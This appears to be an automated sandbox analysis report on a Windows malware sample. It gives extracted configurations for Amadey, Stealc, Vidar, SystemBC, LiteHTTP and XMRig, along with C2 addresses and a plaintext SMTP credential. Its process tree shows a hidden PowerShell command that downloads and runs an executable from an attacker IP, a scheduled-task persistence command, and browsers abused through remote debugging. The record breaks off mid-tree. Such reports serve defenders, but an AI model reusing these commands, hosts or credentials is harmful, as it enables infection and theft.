Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 04:27

General

  • Target

    7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe

  • Size

    938KB

  • MD5

    c9c266737131c566122595220c28e0bd

  • SHA1

    55a14ae5976cd04ac14e360c3ec0c22022f1d129

  • SHA256

    7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d

  • SHA512

    b8c23aad7ae2aa022e8d6a1d53beccbca78d4d8282318c6cd571478438c99e36293dcd24a3761764400925b4dd63c5794ffdf01e5096b181dd998c93a8a2c665

  • SSDEEP

    24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:zTvC/MTQYxsWR7a06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.netzero.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    jbarrantes

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • XMRig Miner payload 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 50 IoCs
  • Uses browser remote debugging 2 TTPs 49 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 8 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 44 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:3516
    • C:\Users\Admin\AppData\Local\Temp\7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
      "C:\Users\Admin\AppData\Local\Temp\7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4516
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn CBCM4maaHAC /tr "mshta C:\Users\Admin\AppData\Local\Temp\9I5EaQyYA.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn CBCM4maaHAC /tr "mshta C:\Users\Admin\AppData\Local\Temp\9I5EaQyYA.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4316
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\9I5EaQyYA.hta
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U7SK1CJ9MR3UZNNEKT55QCVEWASGHVKC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4204
          • C:\Users\Admin\AppData\Local\TempU7SK1CJ9MR3UZNNEKT55QCVEWASGHVKC.EXE
            "C:\Users\Admin\AppData\Local\TempU7SK1CJ9MR3UZNNEKT55QCVEWASGHVKC.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2568
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2584
              • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
                "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4092
                • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                  "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3372
                  • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                    "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2472
              • C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
                "C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4508
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                  8⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:3244
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcd12fcc40,0x7ffcd12fcc4c,0x7ffcd12fcc58
                    9⤵
                      PID:1988
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1964 /prefetch:2
                      9⤵
                        PID:2968
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:3
                        9⤵
                          PID:3668
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
                          9⤵
                            PID:4364
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:4012
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:4796
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:772
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
                            9⤵
                              PID:448
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4428 /prefetch:8
                              9⤵
                                PID:3584
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4428,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4448 /prefetch:8
                                9⤵
                                  PID:5180
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:8
                                  9⤵
                                    PID:5260
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
                                    9⤵
                                      PID:5368
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5156 /prefetch:8
                                      9⤵
                                        PID:5416
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8
                                        9⤵
                                          PID:5460
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5260 /prefetch:8
                                          9⤵
                                            PID:5832
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4992,i,15035772134269396548,8593764247279115740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5188 /prefetch:2
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5744
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                          8⤵
                                          • Uses browser remote debugging
                                          • Enumerates system info in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5216
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd13046f8,0x7ffcd1304708,0x7ffcd1304718
                                            9⤵
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5468
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                            9⤵
                                              PID:5836
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
                                              9⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5856
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                                              9⤵
                                                PID:5784
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:5956
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:5968
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:2576
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,10443888401807672682,16515153412976195650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:1368
                                          • C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Downloads MZ/PE file
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3628
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                              8⤵
                                              • Uses browser remote debugging
                                              • Enumerates system info in registry
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              PID:768
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffccfadcc40,0x7ffccfadcc4c,0x7ffccfadcc58
                                                9⤵
                                                  PID:4732
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1940 /prefetch:2
                                                  9⤵
                                                    PID:5740
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2192 /prefetch:3
                                                    9⤵
                                                      PID:6132
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2300 /prefetch:8
                                                      9⤵
                                                        PID:2576
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:516
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3400 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:3380
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4600 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:3092
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4676 /prefetch:8
                                                        9⤵
                                                          PID:1616
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:8
                                                          9⤵
                                                            PID:5612
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
